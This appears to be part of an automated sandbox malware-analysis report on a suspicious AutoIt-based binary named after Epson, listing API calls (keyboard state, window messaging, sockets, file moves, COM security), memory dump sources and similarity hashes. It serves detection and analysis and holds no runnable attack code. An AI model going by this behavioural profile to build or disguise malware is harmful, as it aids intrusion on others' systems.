                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                      • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                      • Opcode ID: 5384e45412ee3ee7464a7e8757147a8acf37e64a4766d0d92d1106eb9288cfcb
                                                                                                                                                                                                                                      • Instruction ID: 500b5a613a558c9cb6655781aaad1c62af392c356de05cfdf273aa603ccda33f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5384e45412ee3ee7464a7e8757147a8acf37e64a4766d0d92d1106eb9288cfcb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56915A75A043019FC704EF24C88196AB7E5FF89714F18891EF88A97351DB35ED46EB82
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FB08FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?,?,?,00FB0C4E), ref: 00FB091B
                                                                                                                                                                                                                                        • Part of subcall function 00FB08FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?,?), ref: 00FB0936
                                                                                                                                                                                                                                        • Part of subcall function 00FB08FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?,?), ref: 00FB0944
                                                                                                                                                                                                                                        • Part of subcall function 00FB08FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00FB0831,80070057,?), ref: 00FB0954
                                                                                                                                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00FD56AE
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FD57B6
                                                                                                                                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00FD582C
                                                                                                                                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 00FD5837
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                      • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                      • Opcode ID: ae3837833eafaaaae1673a48931608b32fb3482ca1a201e31f9e601ee611ff68
                                                                                                                                                                                                                                      • Instruction ID: fa5cb9a40b1d9c9695a775e8a4fd2767223b5e3e19af8bf09cdc603303b6bc56
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae3837833eafaaaae1673a48931608b32fb3482ca1a201e31f9e601ee611ff68
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5910471D0021DAFDF10DFA4DC81AEEB7B9AF08714F14416AE915AB251EB349A48EF60
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00FE2C1F
                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00FE2C51
                                                                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00FE2C79
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FE2CAF
                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00FE2CE9
                                                                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00FE2CF7
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FB43AD
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: GetCurrentThreadId.KERNEL32 ref: 00FB43B4
                                                                                                                                                                                                                                        • Part of subcall function 00FB4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00FB2F00), ref: 00FB43BB
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00FE2D7F
                                                                                                                                                                                                                                        • Part of subcall function 00FBF292: Sleep.KERNEL32 ref: 00FBF30A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4196846111-0
                                                                                                                                                                                                                                      • Opcode ID: a317a687e7ed273be2b111856da1ad9a1842c3c4eb5167a3964c0efe88015a2c
                                                                                                                                                                                                                                      • Instruction ID: e77b7d57d4c913906b32d8ae8c578698f007911d34bc565623710fa5f93d8b10
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a317a687e7ed273be2b111856da1ad9a1842c3c4eb5167a3964c0efe88015a2c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B71B075E00204AFCB50DF65CC85AAEB7F5EF48320F148469E916EB351EB34AE41AB90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsWindow.USER32(00000000), ref: 00FE8992
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00FE899E
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00FE8A79
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00FE8AAC
                                                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,00000000), ref: 00FE8AE4
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000EC), ref: 00FE8B06
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FE8B1E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4072528602-0
                                                                                                                                                                                                                                      • Opcode ID: 1582ce6c8328342ecd6ed12d4e2e2e5d80b3b943a0c86bdec0decea98336cfb6
                                                                                                                                                                                                                                      • Instruction ID: 45f280bc260b0bda54ba32f8e8b4db7c380c36e8bf144a176c9052fbbaa936f2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1582ce6c8328342ecd6ed12d4e2e2e5d80b3b943a0c86bdec0decea98336cfb6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8471C374A00284BFDF21AF56C884FBE7BB5FF497A0F140459E84967251CB35AD42EB11
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00FBB8C0
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00FBB8D5
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00FBB936
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FBB964
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FBB983
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FBB9C4
                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FBB9E7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                      • Opcode ID: f72b95fe9ab2d86f57119d10f7dd9683f3738269b00f8e63d74beb39da3ed11b
                                                                                                                                                                                                                                      • Instruction ID: dfc2443a5de3eda38365939f28ec337bdef5e6a64b5bbb2f0e67c88cbdf9cab0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72b95fe9ab2d86f57119d10f7dd9683f3738269b00f8e63d74beb39da3ed11b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D351B1A0D087D53EFB3642368C55BFABEA95B06714F088889E1D9498D2C3D8EDC4EB50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetParent.USER32(00000000), ref: 00FBB6E0
                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00FBB6F5
                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00FBB756
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FBB782
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FBB79F
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FBB7DE
                                                                                                                                                                                                                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FBB7FF
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                      • Opcode ID: 6a62a74baa2833faf3302275abd2fe9982a6321cf27a3a7186ec903bf78853d0
                                                                                                                                                                                                                                      • Instruction ID: 7538c7005f1e9ee550d99fdcd878c81f9d040866acb6c9053ed814dfc4d8e27f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a62a74baa2833faf3302275abd2fe9982a6321cf27a3a7186ec903bf78853d0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8351E1A0E087D53EFB3283268C55BFABEA95B45314F188489E0D94A8D2D7D4EC84FF50
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,00F85F16,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 00F857E3
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00F8585E
                                                                                                                                                                                                                                      • __fassign.LIBCMT ref: 00F85879
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 00F8589F
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,FF8BC35D,00000000,00F85F16,00000000,?,?,?,?,?,?,?,?,?,00F85F16,?), ref: 00F858BE
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,00F85F16,00000000,?,?,?,?,?,?,?,?,?,00F85F16,?), ref: 00F858F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1324828854-0
                                                                                                                                                                                                                                      • Opcode ID: 2a036d512e074b300896964660947ab6c03ff390b1231220f67a15a78aba2889
                                                                                                                                                                                                                                      • Instruction ID: 9845e2d90af7961e903a000b6f09c91f9861f2dc0d488001b8d337c565d6a045
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a036d512e074b300896964660947ab6c03ff390b1231220f67a15a78aba2889
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF51BE71A00649DFDB10DFA8D885BEEBBF8FF08720F14411AE955E7291E730AA41DB61
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F730BB
                                                                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00F730C3
                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F73151
                                                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00F7317C
                                                                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00F731D1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                      • Opcode ID: c867e4a459208a9e52578c3afd4f5c2ad65c7f0e5747cac86c8640eb81eeb43e
                                                                                                                                                                                                                                      • Instruction ID: ca1855c8f4cf46f0142c710ed5376074280b1c4f40bb7c999a268c2ce59887cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c867e4a459208a9e52578c3afd4f5c2ad65c7f0e5747cac86c8640eb81eeb43e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E641A135E00219ABCB10DF68C885AAE7BA5BF44324F54C156E8186B362D775EB01FB92
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FD3AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00FD3AD7
                                                                                                                                                                                                                                        • Part of subcall function 00FD3AAB: _wcslen.LIBCMT ref: 00FD3AF8
                                                                                                                                                                                                                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FD1B6F
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00FD1B7E
                                                                                                                                                                                                                                      • WSAGetLastError.WSOCK32 ref: 00FD1C26
                                                                                                                                                                                                                                      • closesocket.WSOCK32(00000000), ref: 00FD1C56
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2675159561-0
                                                                                                                                                                                                                                      • Opcode ID: b107bbeb0fb1eab42713fcfc27103ce89c006fe384babb1d13c0693555432313
                                                                                                                                                                                                                                      • Instruction ID: 2053dc1a1ff0e82517d088423adcdc394c4d1b84a3f8cf751a5aa6c456a47e26
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b107bbeb0fb1eab42713fcfc27103ce89c006fe384babb1d13c0693555432313
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E341C431A00104AFDB109F64CC85BA9B7AAFF85324F18815AFD059F391D774AD85DBE1
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00FBE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FBD7CD,?), ref: 00FBE714
                                                                                                                                                                                                                                        • Part of subcall function 00FBE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FBD7CD,?), ref: 00FBE72D
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00FBD7F0
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00FBD82A
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBD8B0
                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 00FBD8C6
                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 00FBD90C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                      • Opcode ID: a3dd7d54e372a715c458eb98e0ada5c9fa6b41e6449e86a1ec204f21f96e10df
                                                                                                                                                                                                                                      • Instruction ID: e41b497e51217b6c6e1a201359cea3390b09385b52e0b46d9fdb7a942ba4c654
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3dd7d54e372a715c458eb98e0ada5c9fa6b41e6449e86a1ec204f21f96e10df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8413171D0521C9EDF16EBA5DD81ADE77BCAF08350F1000EAA509EB141EB39A788EF51
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00FE38B8
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE38EB
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE3920
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00FE3952
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00FE397C
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FE398D
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FE39A7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466756338.000000000101D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466779476.0000000001025000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_f50000_Epson.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                                                                      • Opcode ID: 5ac9b2b08d4eb485b14f57869f52d7a89b5b769ab371c547c5d4422ff801af87
                                                                                                                                                                                                                                      • Instruction ID: 2fddafe96d430bc126d167c276ab9eb427205e44f1618992405df22973b6e710
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5ac9b2b08d4eb485b14f57869f52d7a89b5b769ab371c547c5d4422ff801af87
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9312531B04299AFDB318F4ADC8CF6837A1EB86760F1501A4F5409F2A6CB75AA44EB01
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FB80D0
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00FB80F6
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00FB80F9
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00FB8117
                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00FB8120
                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00FB8145
                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00FB8153
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.2466629985.0000000000F51000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466608412.0000000000F50000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000000FED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.2466703635.0000000001013000.00000002.00000001.01000000.00000007.sdmpDownload File
